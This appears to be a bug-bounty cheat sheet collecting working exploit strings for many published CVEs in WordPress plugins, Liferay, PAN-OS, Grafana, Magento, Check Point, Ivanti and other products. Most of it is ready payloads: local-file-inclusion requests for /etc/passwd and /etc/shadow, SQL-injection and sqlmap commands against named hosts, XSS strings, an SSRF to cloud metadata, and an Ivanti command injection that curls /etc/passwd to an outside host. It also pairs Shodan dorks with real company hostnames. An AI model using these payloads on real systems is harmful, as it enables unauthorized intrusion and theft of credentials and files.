💎My CVE Approach
WordPress and Plugings CVE
WooCommerce plugin allows LFI!
02: Capture request in Burp
03: Change request method to POST and add:
POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1
04: Also add:
action=woof_text_search&
05: That’s it! You got local files.
-------------------------------------------------
1
CMS Technology Based CVE
Tomcat: /manager/tomcat /..;/
Drupal CMS:
/core/install.php
/install.php
Admin panel takeover
POC: cat ip.txt | while read host; do for path in /install.php /core/install.php; do echo "$host$path"; done; done | httpx -mc 200 -sc -cl -title | grep "Choose language"
Prestashop CMS module
POC: curl -v 'https://localhost/modules/appagebuilder/apajax.php?leoajax=1&product_manufacture=1,1)+or+sleep(4)%23--'
https://security.friendsofpresta.org/modules/2023/01/05/appagebuilder.html
Liferay CMS Portal RXSS - CVE-2025–4388
https://medium.com/@tsxninja2004/rxss-on-mercedes-benz-71a839da2d31
Shodan: Hostname:"nokia.com" html:"liferayPortalCSS"
Exploit URL: /o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E
Liferay Portal/DXP Reflected XSS in Blogs Web - CVE-2025-4576
template: https://github.com/projectdiscovery/nuclei-templates/issues/12862
Shodan: Hostname:"nokia.com" html:"liferayPortalCSS"
Exploit URL: /o/blogs-web/blogs/entry_cover_image_caption.jsp?coverImageCaption=%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E"
Palo Alto Networks PAN‑OS - (XSS) vulnerability - CVE-2025–0133
https://ch4ndan.medium.com/how-i-found-xss-cve-2025-0133-using-shodan-39a37eae7807
Shodan: hostname:target.com os:"PAN-OS"
Exploit URL: /ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
Palo Alto Networks PAN-OS: OS Command Injection in GlobalProtect - CVE-2024-3400
https://github.com/schooldropout1337/CVE-2024-3400/blob/main/CVE20243400.yaml
Grafana Path Traversal - CVE-2025-4123
https://github.com/ynsmroztas/CVE-2025-4123-Exploit-Tool-Grafana-
POC:
Open Redirect URL: http://103.175.2.234:30000/public/..%2F%5Cevil.com%2F%3f%2F..%2F..
SSRF URL: http://103.175.2.234:30000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[LFI URL: http://103.175.2.234:30000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
XSS URL: http:
//103.175.2.234:30000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
Magento CMS - SQL injection -CVE-2019-8130
https://pentest-tools.com/blog/exploiting-sql-injection-in-magento-with-sqlmap
sqlmap -u 'http://db.novapay.com:8080/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=' -p "ids[0][product_id][to]" --prefix=")))" --suffix=" -- -" --technique=BT --ignore-code=400 --level=5 --risk=3 --no-cast --batch
Minio Console - CVE-2023-28432
https://github.com/acheiii/CVE-2023-28432
POC:
POST /minio/bootstrap/v1/verify HTTP/1.1
Typo3 CMS: ?type=* parameter is vulnerable to SQL
Payload ; -1+OR+3 AND if(now()=sysdate(),SLEEP(9),0)-- wXyW2 AND if(now()=sysdate(),SLEEP(9),0)-- wXyW1=6 +AND+000762=000762
wordpress CMS:
https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-exploit
Mura CMS:
https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS?tab=readme-ov-file
Adobe Experience Manager:
1): XSS to childlist selector in AEM POC:
/sdfsdf.childrenlist.html
/sdfsdf.childrenlist.sdfsdf.html
/xx<a href="javascript:prompt(document%2edomain)">aaaa.childrenlist.html
/seguros/especialidades/"><img src=a onerror=alert(document.domain)>.childrenlist.html
/etc/designs/xh1x.childrenlist.json//<img src=x onerror=alert(origin)>.html
/xh1x.childrenlist.json//%3Csvg%20onload=alert('XSS')%3E.htmlxx/etc/designs/xh1x.childrenlist.json3
4
Wayback URL Grep CVE
cPanel RXSS CVE-2023-29489
/cpanelwebcall/<img src=x onerror="prompt(1)">aaaaaaaaaaaa
------------
JIRA Information Disclosure Endpoint:
cat endpoint.txt | grep "secure" | grep "jspa"
cat endpoint.txt | grep "jira"
Endpoint: /secure/QueryComponent!Default.jspa
------------
CVE-2023-25157 - GeoServer SQL Injection
https://github.com/win3zz/CVE-2023-25157
cat endpoint.txt | grep '/geoserver/ows/'
geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=layername&CQL_FILTER=1=1;SELECT version()--
------------
SQL Injection
cat endpoint.txt | grep '?id='
Payload : if(now()=sysdate(),SLEEP(8),0)
------------
GANGLIA RXSS:
cat endpoint.txt | grep ganglia
cat endpoint.txt | grep graph_all_periods.php
Vulnerable Parameter: h
Payload: ')"><img src=0 onerror=prompt();>
------------
Keycloak Endpoint
Keycloak 10.0.0 to 18.0.0 have a POST based XSS vulnerability at the endpoints
/auth/realms/master/clients-registrations/default
/auth/realms/master/clients-registrations/openid-connect
/realms/master/clients-registrations/default
/realms/master/clients-registrations/openid-connect
cat endpoint.txt | grep "keycloak"
cat endpoint.txt | grep "/realms/master"5
Shodan search CVE
CVE-2024-24919 LFI - Path terversal
shodan http.html:"Check Point ssl network" ssl:"target"
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
====================================
IVANTI
shodan title:"Ivanti Connect" hostname:"target.*"
Poc: https :// [ivanti-ip/domain]/api/v1/license/keys-status/;curl -X POST -d @/etc/passwd oastify[.]xxxxx
https://github.com/h4x0r-dz/CVE-2024-21893.py
====================================
CVE-2024-27348 (RCE) -
Unauth users can execute commands via Groovy injection
in Apache HugeGraph-Server.
Fix: Upgrade to version 1.3.0
POC: https://github.com/Zeyad-Azima/CVE-2024-27348
FOFA: app="HugeGraph-Studio"
SHODAN: http.title:"HugeGraph"Last updated